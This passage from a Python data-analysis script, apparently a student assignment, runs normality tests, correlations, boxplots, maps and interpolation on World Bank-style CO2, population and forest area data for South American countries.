True)\r\n\r\n# the column had wrong name so have to rename\r\nsa_box.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# plotting the boxplot\r\nfig12 = sa_box.boxplot(rot = 45,\r\n fontsize = 10,\r\n grid = True,\r\n color = 'purple')\r\n\r\n# adding extra things for visualisation\r\nplt.title('The CO2 emissions of South American Countries')\r\nplt.ylabel('CO2 emissions')\r\nplt.xlabel('Country')\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure12.png')\r\n\r\n'''\r\nfrom the boxplot there appears to be outliers above the boxplot\r\nin the countries:\r\n - Bolivia\r\n - Guyana\r\n - Peru\r\n - Suriname \r\n - Uruguay\r\nthis makes sense owing to the CO2 emissions data values being \r\nvery close together and thus some values are 2 standard deviations above\r\nthe mean. Interesting no outliers below the boxplot.\r\n'''\r\n\r\n\r\n\"\"\" Population Dataset and Pre-Processing \"\"\"\r\n\r\n# reading in the new dataframe\r\ndf2 = pd.read_csv('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/total population.csv',\r\n header = 2,\r\n engine = \"python\",\r\n dtype = \"str\")\r\n\r\n# performing pre-processing and some basic statistics\r\nprint(pre_processing(df2))\r\n\r\n# ensuring the columns have the correct datatype now\r\nfor col in df2.columns[4:]:\r\n df2 = clean_convert(df2, col)\r\n\r\n# dropping unuseful columns\r\ndf2.drop(labels = ['Country Code', 'Indicator Name', 'Indicator Code', '2019', '2020', 'Unnamed: 65'],\r\n axis = 1, # column axis\r\n inplace = True)\r\n\r\n# renaming a column\r\ndf.loc[254, 'Country Name'] = \"Venezuela\"\r\n\r\n\r\n\"\"\" Subsetting the data Population data to be only South American countries \"\"\"\r\n\r\nsa_df2 = df2[(df2['Country Name'] == 'Argentina') |\r\n (df2['Country Name'] == 'Bolivia') |\r\n (df2['Country Name'] == 'Brazil') |\r\n (df2['Country Name'] == 'Chile') |\r\n (df2['Country Name'] == 'Colombia') |\r\n (df2['Country Name'] == 'Ecuador') |\r\n (df2['Country Name'] == 'Guyana') |\r\n (df2['Country Name'] == 'Paraguay') |\r\n (df2['Country Name'] == 'Peru') |\r\n (df2['Country Name'] == 'Suriname') |\r\n (df2['Country Name'] == 'Uruguay') |\r\n (df2['Country Name'] == 'Venezuela')]\r\n\r\n# resetting the index \r\nsa_df2.reset_index(inplace = True,\r\n drop = True)\r\n\r\n\r\n\"\"\" Summary Statistics on SA Dataset \"\"\"\r\nprint(pre_processing(sa_df2))\r\n\r\n\r\n\"\"\" Shapiro-Wilk test for normality on SA Population dataset \"\"\"\r\n\r\n# performing shapiro-wilk test\r\npop_shapiro_test = (sa_df2.groupby('Country Name')\r\n .apply(lambda x: pd.Series(shapiro(x), index = ['W', 'P'])))\r\n\r\n# printing the results of the test to the console\r\nprint(pop_shapiro_test)\r\n\r\n'''\r\nCountries accept null hypothesis: None\r\n(countries are normality distributed across the years)\r\n\r\nCountries reject null hypothesis: All\r\n(countries are not normality distributed across the years)\r\n'''\r\n\r\n\r\n\"\"\" Skewness and Kurtosis on SA Population dataset \"\"\"\r\n\r\n# performing shapiro-wilk test\r\nskewness_test2 = (sa_df2.groupby('Country Name')\r\n .apply(lambda x: pd.Series(skew(x))))\r\n\r\nkurtosis_test2 = (sa_df2.groupby('Country Name')\r\n .apply(lambda x: pd.Series(kurtosis(x))))\r\n\r\n# printing the results of the test to the console\r\nprint(skewness_test2, '\\n', \r\n kurtosis_test2)\r\n\r\n\r\n\"\"\" Boxplot to look for outliers in each COUNTRY (over the years) \"\"\"\r\n\r\n# transposing the 
data\r\nsa_pop_box = sa_df2.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_pop_box.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# the column had wrong name so have to rename\r\nsa_pop_box.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# plotting the boxplot\r\nfig13 = sa_pop_box.boxplot(rot = 45,\r\n fontsize = 10,\r\n grid = True,\r\n color = 'orange')\r\n\r\n# adding extra things for visualisation\r\nplt.title('The Population of South American Countries')\r\nplt.ylabel('Population (billions)')\r\nplt.xlabel('Country')\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n'''\r\nfrom the boxplot there appears to only be outliers above the boxplot\r\nin the country Guyana.\r\n'''\r\n\r\n# saving the boxplot\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure13.png')\r\n\r\n\r\n\r\n\"\"\" Double axis plot (trying something new) \"\"\"\r\n\r\n\"\"\" Data Manipulation of CO2 emissions\"\"\"\r\n\r\n# copy original data\r\nco2_df = df.copy()\r\n\r\n# adding total rows and columns for plots\r\nco2_df.loc['Column_Total']= co2_df.sum(numeric_only=True, axis=0)\r\n\r\n# transposing data to make it easy\r\nco2_df = co2_df.set_index('Country Name').transpose()\r\nco2_df.reset_index(level = 0,\r\n inplace = True)\r\nco2_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# rename the NaN column\r\nco2_df.rename(columns = {np.nan: \"Column Total\" }, \r\n inplace = True)\r\n\r\n# subset new dataframe \r\nco2_df = co2_df[['Year', 'Column Total']]\r\n\r\n\r\n\"\"\" Data Manipulation of Population \"\"\"\r\n\r\n# copy original population data to add to the plot above\r\npop_df = df2.copy()\r\n\r\n# adding total rows and columns for plots\r\npop_df.loc['Column_Total']= pop_df.sum(numeric_only=True, axis=0)\r\n#co2_df.loc[:,'Row_Total'] = co2_df.sum(numeric_only=True, axis=1)\r\n\r\n# transposing data to make it easy\r\npop_df = pop_df.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\npop_df.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# renaming the column to access it \r\npop_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# rename the NaN column\r\npop_df.rename(columns = {np.nan: \"Column Total\" }, \r\n inplace = True)\r\n\r\n# subset new dataframe \r\npop_df = pop_df[['Year', 'Column Total']]\r\n\r\n\r\n\"\"\" Total CO2 line plot \"\"\"\r\n\r\n# plotting the TOTAL co2 emissions through the years\r\nfig1, axs1 = plt.subplots(figsize = (20, 10))\r\naxs1.plot(co2_df['Year'], co2_df['Column Total'],\r\n color = 'magenta', \r\n marker = 'o', \r\n linestyle = 'dashed',\r\n linewidth = 2, \r\n markersize = 12,\r\n label = 'World CO2 emissions')\r\n\r\n# adding extra items to the plot\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Years',\r\n fontsize = 20)\r\nplt.ylabel('CO2 emissions (kt in 100 million)',\r\n fontsize = 20)\r\nplt.legend(loc = 'upper left',\r\n fontsize = 15)\r\n\r\n# twinning the axs to make two plots on one figure (CO2 emissions and pop)\r\naxs11 = axs1.twinx()\r\n\r\n\r\n\"\"\" Total Population line plot \"\"\"\r\n\r\n# plotting the TOTAL pop emissions through the years\r\naxs11.plot(pop_df['Year'], pop_df['Column Total'],\r\n color = 'orange', \r\n marker = 'o', \r\n linestyle = 'dashed',\r\n linewidth = 2, \r\n markersize = 12,\r\n label = 'World Population')\r\n\r\n# adding extra things to the plot for better visualisation\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Years',\r\n fontsize = 20)\r\nplt.ylabel('Population (in billions)',\r\n fontsize = 
20)\r\nplt.legend(loc = 'lower right',\r\n fontsize = 15)\r\n\r\n# show the figure with two different y-axis\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure11.png')\r\n\r\n\r\n\"\"\" Correlation between WORLD CO2 and Pop datasets overtime \"\"\"\r\n\r\n# using the .corrwith function to do the whole of the subsetted dataframe\r\nprint('WORLD: correlation between population and CO2 emissions')\r\nprint(co2_df.corrwith(pop_df))\r\n\r\n\r\n\r\n\"\"\" Trying something new for a map of south america CO2 emissions (1980 and 2018)\"\"\"\r\n\r\n# copying south american dataset\r\nsa_df2 = sa_df.copy()\r\n\r\n# renaming the a column so it is easier to manipulate\r\nsa_df2.rename(columns = {'Country Name': 'country'},\r\n inplace = True)\r\n\r\n#function to convert to alpah2 country codes\r\ndef cont_convert(row):\r\n # convert country name to country code \r\n for country in row.country:\r\n try:\r\n cn_code = pc.country_name_to_country_alpha2(row.country, \r\n cn_name_format = \"default\")\r\n # if an error occurs (prevention of code not running)\r\n except KeyError:\r\n pass\r\n return cn_code\r\n\r\n# applying function to dataframe\r\nsa_df2['code'] = sa_df2.apply(cont_convert, \r\n axis = 1)\r\n# making sure it has worked\r\nprint(sa_df2.tail())\r\n\r\n# libraries for specific method\r\nimport plotly\r\nimport plotly.express as px\r\n\r\n# create figure for the newest measurements\r\nfig2 = px.choropleth(sa_df2,\r\n locations = 'country',\r\n locationmode = \"country names\",\r\n color = '2018', \r\n scope = \"south america\")\r\n\r\n# plotly is browser based so had to write as a html to view image\r\nfig2.write_html(\"C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure2.html\")\r\n\r\n# create figure for the oldest measurements\r\nfig3 = px.choropleth(sa_df2,\r\n locations = 'country',\r\n locationmode = \"country names\",\r\n color = '1960', \r\n scope = \"south america\")\r\n\r\n# plotly is browser based so had to write as a html to view image\r\nfig3.write_html(\"C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure3.html\")\r\n\r\n'''\r\nthese two figures when looked at using the HTML are interactive,\r\nwhereby using the mouse and hovering over a particular \r\nsouth american country the map displays the country name and \r\nthe actual CO2 emissions of the respective country. 
However,\r\nthis cannot be observed within the A4 report.\r\n'''\r\n\r\n\r\n\"\"\" Correlation between 1980 and 2018 for CO2 emissions \"\"\"\r\n\r\n#adding row total into the table\r\nsa_df2.loc[:,'Row_Total'] = sa_df2.sum(numeric_only=True, axis=1)\r\n\r\nco2_1980 = sa_df2['1980']\r\nprint(\"CO2 emissions in 1980 =\", '\\n', co2_1980)\r\nco2_2018 = sa_df2['2018']\r\nprint(\"CO2 emissions in 2018 =\", '\\n', co2_2018)\r\n\r\nprint('CO2 EMISSIONS: Correlation between 1980 and 2018 in SA countries')\r\na, b = stats.pearsonr(co2_1980, co2_2018)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(co2_1980, co2_2018)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\n\r\n\r\n\"\"\" Stacked area plot of CO2 production \"\"\"\r\n\r\n# transposing data for ease of manipulation\r\nsa_co2_df = sa_df.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_co2_df.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# the column had wrong name so have to rename\r\nsa_co2_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# plot\r\nfig4 = sa_co2_df.plot(kind = 'area',\r\n legend = True,\r\n figsize = (15, 8),\r\n colormap = 'plasma')\r\naxs4 = plt.subplot()\r\n\r\n# adding on extra things to the plot\r\nplt.xticks(range(0,len(sa_co2_df.Year.values)), sa_co2_df.Year.values)\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Year',\r\n fontsize = 20)\r\nplt.ylabel('CO2 Emissions (kt per million)',\r\n fontsize = 20)\r\nplt.legend(fontsize = 15)\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure4.png')\r\n\r\n\r\n\"\"\" Stacked area map of Population \"\"\"\r\n\r\n# transposing data for ease of manipulation\r\nsa_pop_df = sa_df2.set_index('Country Name').transpose()\r\nsa_pop_df.reset_index(level = 0,\r\n inplace = True)\r\nsa_pop_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\nlabels = sa_co2_df['Year']\r\n\r\n# define plot and axis \r\nfig5 = sa_pop_df.plot(kind = 'area',\r\n legend = True,\r\n figsize = (15, 8),\r\n colormap = 'plasma')\r\naxs5 = plt.subplot()\r\n\r\n# adding extra things for visualisation\r\nplt.xticks(range(0,len(sa_pop_df.Year.values)), sa_pop_df.Year.values)\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Year',\r\n fontsize = 20)\r\nplt.ylabel('Population (per 100 million)',\r\n fontsize = 20)\r\nplt.legend(fontsize = 15)\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure5.png')\r\n\r\n\r\n\"\"\" Line Plot of CO2 Production \"\"\"\r\n\r\n# copying CO2 dataset so not override previous versions\r\nsa_df3 = sa_df.copy()\r\n\r\n# transposing the data\r\nsa_df3 = sa_df3.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_df3.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# the first column had no name so now naming it to access it\r\nsa_df3.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# defining plot \r\nfig6 = sa_df3.plot(kind = 'line',\r\n legend = True,\r\n figsize = (15, 8),\r\n colormap = 'plasma')\r\n\r\n# adding extra items for visualisation\r\nplt.xticks(range(0,len(sa_df3.Year.values)), sa_df3.Year.values)\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Year',\r\n fontsize = 20)\r\nplt.ylabel('CO2 Emissions (kt)',\r\n fontsize = 20)\r\nplt.legend(fontsize = 15)\r\n\r\n# show the plot\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data 
Science 1/Assignment 2/figure6.png')\r\n\r\n\r\n\"\"\" Line Plot of Population \"\"\"\r\n\r\n# define new plot \r\nfig7 = sa_pop_df.plot(kind = 'line', \r\n linestyle = 'dashed',\r\n legend = True,\r\n figsize = (15, 8),\r\n colormap = 'plasma',\r\n layout = 'tight')\r\n\r\n# adding extra things to fig7 for visualisation\r\nplt.xticks(range(0,len(sa_pop_df.Year.values)), sa_pop_df.Year.values)\r\nplt.xticks(rotation = 90)\r\nplt.xlabel('Year',\r\n fontsize = 20)\r\nplt.ylabel('Population (per 100 million)',\r\n fontsize = 20)\r\nplt.legend(fontsize = 15)\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure7.png')\r\n\r\n\r\n\r\n\"\"\"\" Correlation Analysis between Indicators \"\"\"\r\n\r\n\r\n\"\"\" Correlation Figure on the two datasets (for visualisation) \"\"\"\r\n\r\n# plot correlation matrix of SA CO2 dataframe\r\nplt.figure(figsize = (15, 8))\r\nplt.matshow(sa_co2_df.corr())\r\nplt.title(\"Correlation between South American CO2 emissions\")\r\nprint(\"Correlation =\", '\\n', sa_co2_df.corr())\r\n\r\n#plotting colorbar\r\ncb = plt.colorbar()\r\ncb.ax.tick_params(labelsize = 14)\r\n\r\n# showing the plot\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure8.png')\r\n\r\n\r\n\r\n# plot correlation matrix of SA Population dataframe\r\nplt.figure(figsize = (15, 8))\r\nplt.matshow(sa_pop_df.corr())\r\nplt.title(\"Correlation between South American Population\")\r\nprint(\"Correlation =\", '\\n', sa_co2_df.corr())\r\n\r\n#plotting colorbar\r\ncb = plt.colorbar()\r\ncb.ax.tick_params(labelsize = 14)\r\n\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure9.png')\r\n\r\n\r\n\r\n\"\"\" Manipulation of CO2 emission \"\"\"\r\n\r\n#Identifying rows to use \r\narg_row = df.loc[df['Country Name'] == 'Argentina']\r\nbra_row = df.loc[df['Country Name'] == 'Brazil']\r\nper_row = df.loc[df['Country Name'] == 'Peru']\r\nuru_row = df.loc[df['Country Name'] == 'Uruguay']\r\nbol_row = df.loc[df['Country Name'] == 'Bolivia']\r\nchil_row = df.loc[df['Country Name'] == 'Chile']\r\ncol_row = df.loc[df['Country Name'] == 'Colombia']\r\nven_row = df.loc[df['Country Name'] == 'Venezuela']\r\necu_row = df.loc[df['Country Name'] == 'Ecuador']\r\nguy_row = df.loc[df['Country Name'] == 'Guyana']\r\npar_row = df.loc[df['Country Name'] == 'Paraguay']\r\nsur_row = df.loc[df['Country Name'] == 'Suriname']\r\n\r\n'''\r\nthe following code for CO2 emissions and Population follow:\r\n 1. country_values = identifying the cells in the row \r\n (values of each variable)\r\n 2. country_list = making the values into a numpy list \r\n 3. 
country_list = flattening the values into a 1D array\r\n'''\r\n\r\narg_values = arg_row.iloc[0:, 1:]\r\narg_list = np.array(arg_values.values.tolist())\r\narg_list = np.ndarray.flatten(arg_list)\r\n\r\nbra_values = bra_row.iloc[0:, 1:]\r\nbra_list = np.array(bra_values.values.tolist())\r\nbra_list = np.ndarray.flatten(bra_list)\r\n\r\nper_values = per_row.iloc[0:, 1:]\r\nper_list = np.array(per_values.values.tolist())\r\nper_list = np.ndarray.flatten(per_list) \r\n\r\nuru_values = uru_row.iloc[0:, 1:]\r\nuru_list = np.array(uru_values.values.tolist())\r\nuru_list = np.ndarray.flatten(uru_list) \r\n\r\nbol_values = bol_row.iloc[0:, 1:]\r\nbol_list = np.array(bol_values.values.tolist())\r\nbol_list = np.ndarray.flatten(bol_list)\r\n\r\nchil_values = chil_row.iloc[0:, 1:]\r\nchil_list = np.array(chil_values.values.tolist())\r\nchil_list = np.ndarray.flatten(chil_list)\r\n\r\ncol_values = col_row.iloc[0:, 1:]\r\ncol_list = np.array(col_values.values.tolist())\r\ncol_list = np.ndarray.flatten(col_list) \r\n\r\nven_values = ven_row.iloc[0:, 1:]\r\nven_list = np.array(ven_values.values.tolist())\r\nven_list = np.ndarray.flatten(ven_list) \r\n\r\npar_values = par_row.iloc[0:, 1:]\r\npar_list = np.array(par_values.values.tolist())\r\npar_list = np.ndarray.flatten(par_list)\r\n\r\nguy_values = guy_row.iloc[0:, 1:]\r\nguy_list = np.array(guy_values.values.tolist())\r\nguy_list = np.ndarray.flatten(guy_list)\r\n\r\nsur_values = sur_row.iloc[0:, 1:]\r\nsur_list = np.array(sur_values.values.tolist())\r\nsur_list = np.ndarray.flatten(sur_list) \r\n\r\necu_values = ecu_row.iloc[0:, 1:]\r\necu_list = np.array(ecu_values.values.tolist())\r\necu_list = np.ndarray.flatten(ecu_list) \r\n\r\n\r\n\"\"\" Manipulation of Population dataframe \"\"\"\r\n\r\narg_row2 = df2.loc[df2['Country Name'] == 'Argentina']\r\nbra_row2 = df2.loc[df2['Country Name'] == 'Brazil']\r\nper_row2 = df2.loc[df2['Country Name'] == 'Peru']\r\nuru_row2 = df2.loc[df2['Country Name'] == 'Uruguay']\r\nbol_row2 = df2.loc[df2['Country Name'] == 'Bolivia']\r\nchil_row2 = df2.loc[df2['Country Name'] == 'Chile']\r\ncol_row2 = df2.loc[df2['Country Name'] == 'Colombia']\r\nven_row2 = df2.loc[df2['Country Name'] == 'Venezuela']\r\necu_row2 = df2.loc[df2['Country Name'] == 'Ecuador']\r\nguy_row2 = df2.loc[df2['Country Name'] == 'Guyana']\r\npar_row2 = df2.loc[df2['Country Name'] == 'Paraguay']\r\nsur_row2 = df2.loc[df2['Country Name'] == 'Suriname']\r\n\r\narg_values2 = arg_row2.iloc[0:, 1:]\r\narg_list2 = np.array(arg_values2.values.tolist())\r\narg_list2 = np.ndarray.flatten(arg_list2)\r\n\r\nbra_values2 = bra_row2.iloc[0:, 1:]\r\nbra_list2 = np.array(bra_values2.values.tolist())\r\nbra_list2 = np.ndarray.flatten(bra_list2)\r\n\r\nper_values2 = per_row2.iloc[0:, 1:]\r\nper_list2 = np.array(per_values2.values.tolist())\r\nper_list2 = np.ndarray.flatten(per_list2) \r\n\r\nuru_values2 = uru_row2.iloc[0:, 1:]\r\nuru_list2 = np.array(uru_values2.values.tolist())\r\nuru_list2 = np.ndarray.flatten(uru_list2)\r\n\r\nbol_values2 = bol_row2.iloc[0:, 1:]\r\nbol_list2 = np.array(bol_values2.values.tolist())\r\nbol_list2 = np.ndarray.flatten(bol_list2)\r\n\r\nchil_values2 = chil_row2.iloc[0:, 1:]\r\nchil_list2 = np.array(chil_values2.values.tolist())\r\nchil_list2 = np.ndarray.flatten(chil_list2)\r\n\r\ncol_values2 = col_row2.iloc[0:, 1:]\r\ncol_list2 = np.array(col_values2.values.tolist())\r\ncol_list2 = np.ndarray.flatten(col_list2) \r\n\r\nven_values2 = ven_row2.iloc[0:, 1:]\r\nven_list2 = np.array(ven_values2.values.tolist())\r\nven_list2 = 
np.ndarray.flatten(ven_list2) \r\n\r\npar_values2 = par_row2.iloc[0:, 1:]\r\npar_list2 = np.array(par_values2.values.tolist())\r\npar_list2 = np.ndarray.flatten(par_list2)\r\n\r\nguy_values2 = guy_row2.iloc[0:, 1:]\r\nguy_list2 = np.array(guy_values2.values.tolist())\r\nguy_list2 = np.ndarray.flatten(guy_list2)\r\n\r\nsur_values2 = sur_row2.iloc[0:, 1:]\r\nsur_list2 = np.array(sur_values2.values.tolist())\r\nsur_list2 = np.ndarray.flatten(sur_list2) \r\n\r\necu_values2 = ecu_row2.iloc[0:, 1:]\r\necu_list2 = np.array(ecu_values2.values.tolist())\r\necu_list2 = np.ndarray.flatten(ecu_list2) \r\n\r\n\r\n\"\"\" Correlation for the countries in South America \"\"\"\r\n\r\nprint('ARGENTINA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(arg_list, arg_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(arg_list, arg_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('BRAZIL: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(bra_list, bra_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(bra_list, bra_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('PERU: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(per_list, per_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(per_list, per_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('URUGUAY: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(uru_list, uru_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(uru_list, uru_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('BOLIVIA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(bol_list, bol_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(bol_list, bol_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('CHILE: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(chil_list, chil_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(chil_list, chil_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('COLOMBIA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(col_list, col_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(col_list, col_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('VENEZUELA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(ven_list, ven_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(ven_list, ven_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('ECUADOR: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(ecu_list, ecu_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(ecu_list, ecu_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('GUYANA: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(guy_list, guy_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(guy_list, guy_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('PARAGUAY: correlation between population and CO2 emissions')\r\na, b = stats.pearsonr(par_list, par_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(par_list, par_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\nprint('SURINAME: correlation between 
population and CO2 emissions')\r\na, b = stats.pearsonr(sur_list, sur_list2)\r\nprint(f'pearson rank test: r={a}, p={b}')\r\nc, d = stats.spearmanr(sur_list, sur_list2)\r\nprint(f'spearman rank test: r={c}, p={d}')\r\n\r\n\r\n\r\n\"\"\" Experimenting with Interpolation \"\"\"\r\n\r\n'''\r\nwhy? because the data I selected unfortunately did not have\r\nany NA/missing values; therefore, I still wanted to ensure\r\nI knew how to perform interpolation and thus selected a \r\nnew dataset that I observed to have several NA values.\r\n'''\r\n\r\ndf3 = pd.read_csv('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/forest area.csv',\r\n                  header = 4, # it removes the top 4 lines of jargon as it's not data\r\n                  engine = \"python\")\r\n\r\n# correcting the country name in row 254\r\ndf3.loc[254, 'Country Name'] = \"Venezuela\"\r\n\r\n# removing unwanted columns\r\ndf3.drop(['Country Code', 'Indicator Name', 'Indicator Code'],\r\n         axis = 1,\r\n         inplace = True)\r\n\r\n# subsetting the data\r\nsa_df3 = df3[(df3['Country Name'] == 'Argentina') |\r\n             (df3['Country Name'] == 'Bolivia') |\r\n             (df3['Country Name'] == 'Brazil') |\r\n             (df3['Country Name'] == 'Chile') |\r\n             (df3['Country Name'] == 'Colombia') |\r\n             (df3['Country Name'] == 'Ecuador') |\r\n             (df3['Country Name'] == 'Guyana') |\r\n             (df3['Country Name'] == 'Paraguay') |\r\n             (df3['Country Name'] == 'Peru') |\r\n             (df3['Country Name'] == 'Suriname') |\r\n             (df3['Country Name'] == 'Uruguay') |\r\n             (df3['Country Name'] == 'Venezuela')]\r\n\r\n# resetting the index \r\nsa_df3.reset_index(inplace = True,\r\n                   drop = True)\r\n\r\n\r\n\"\"\" Summary statistics of the Forest Area Dataset \"\"\"\r\n\r\n# performing pre-processing and basic statistics using functions\r\n#print(pre_processing(sa_for_df))\r\n\r\n\r\n\"\"\" Shapiro-Wilk test for normality on SA Forest Area dataset \"\"\"\r\n\r\n# copying the dataset\r\nsa_for_df1 = sa_df3.copy()\r\nprint(sa_for_df1.head())\r\n\r\nfrom scipy.stats import shapiro\r\n\r\n# performing shapiro-wilk test\r\nshapiro_test3 = (sa_for_df1.groupby('Country Name')\r\n                 .apply(lambda x: pd.Series(shapiro(x), index = ['W', 'P'])))\r\n\r\n# printing the results of the test to the console\r\nprint(shapiro_test3)\r\n\r\n'''\r\nCountries that accept the null hypothesis: \r\n    Bolivia, Colombia, Ecuador, Paraguay, Peru, \r\n    Uruguay, and Venezuela\r\n(countries are normally distributed across the years)\r\n\r\nCountries that reject the null hypothesis: \r\n    Argentina, Brazil, Chile, Guyana, and Suriname\r\n(countries are not normally distributed across the years)\r\n'''\r\n\r\n\r\n\"\"\" Skewness and Kurtosis on SA Forest Area dataset \"\"\"\r\n\r\n# performing skewness and kurtosis tests\r\nskewness_test3 = (sa_for_df1.groupby('Country Name')\r\n                  .apply(lambda x: pd.Series(skew(x))))\r\n\r\nkurtosis_test3 = (sa_for_df1.groupby('Country Name')\r\n                  .apply(lambda x: pd.Series(kurtosis(x))))\r\n\r\n# printing the results of the test to the console\r\nprint(skewness_test3, '\\n', \r\n      kurtosis_test3)\r\n\r\n\r\n\"\"\" Boxplot to look for outliers in each COUNTRY (over the years) \"\"\"\r\n\r\nsa_for_box = sa_for_df1.set_index('Country Name').transpose()\r\n\r\n# resetting the index\r\nsa_for_box.reset_index(level = 0,\r\n                       inplace = True)\r\n\r\n# the column had wrong name so have to rename\r\nsa_for_box.rename(columns = {\"index\": \"Year\"},\r\n                  inplace = True)\r\n\r\n# plotting the boxplot\r\nfig14 = sa_for_box.boxplot(rot = 45,\r\n                           fontsize = 10,\r\n                           grid = True,\r\n                           color = 'navy')\r\n\r\n# adding extra things for visualisation\r\nplt.title('The Forest Area of South American 
Countries')\r\nplt.ylabel('Forest Area (in millions)')\r\nplt.xlabel('Country')\r\n\r\n# show the graph\r\nplt.show()\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure14.png')\r\n\r\n'''\r\nfrom the boxplot there appears to have no outliers above \r\nor below the boxplots for the countries.\r\n'''\r\n\r\n\"\"\" Interpolation Manipulation \"\"\"\r\n\r\n# transposing data for ease of manipulation\r\nsa_for_df = sa_df3.set_index('Country Name').transpose()\r\n\r\n# resetting the matrix\r\nsa_for_df.reset_index(level = 0,\r\n inplace = True)\r\n\r\n# had no name so now naming it\r\nsa_for_df.rename(columns = {\"index\": \"Year\"},\r\n inplace = True)\r\n\r\n# copying the original data\r\nsa_for_df2 = sa_for_df.copy()\r\n\r\n# dropping any NA values\r\nsa_for_df2.dropna(axis = 0,\r\n inplace = True)\r\n\r\n# changing some values to NA in the dataset\r\nsa_for_df2['Argentina'].replace(['348388', '333780', '317960', '299906', '290970', '288990'], np.NaN,\r\n inplace = True)\r\n\r\n# copying the data for subplots\r\nsa_for_df3 = sa_for_df.copy()\r\nsa_for_df4 = sa_for_df.copy()\r\nsa_for_df5 = sa_for_df.copy()\r\n\r\n# performing interpolation on the SA country: Argentina\r\nsa_for_df3['Argentina'].interpolate(method = 'linear',\r\n limit_direction = 'backward',\r\n inplace = True)\r\nsa_for_df4['Argentina'].interpolate(method = 'nearest',\r\n limit_direction = 'backward',\r\n inplace = 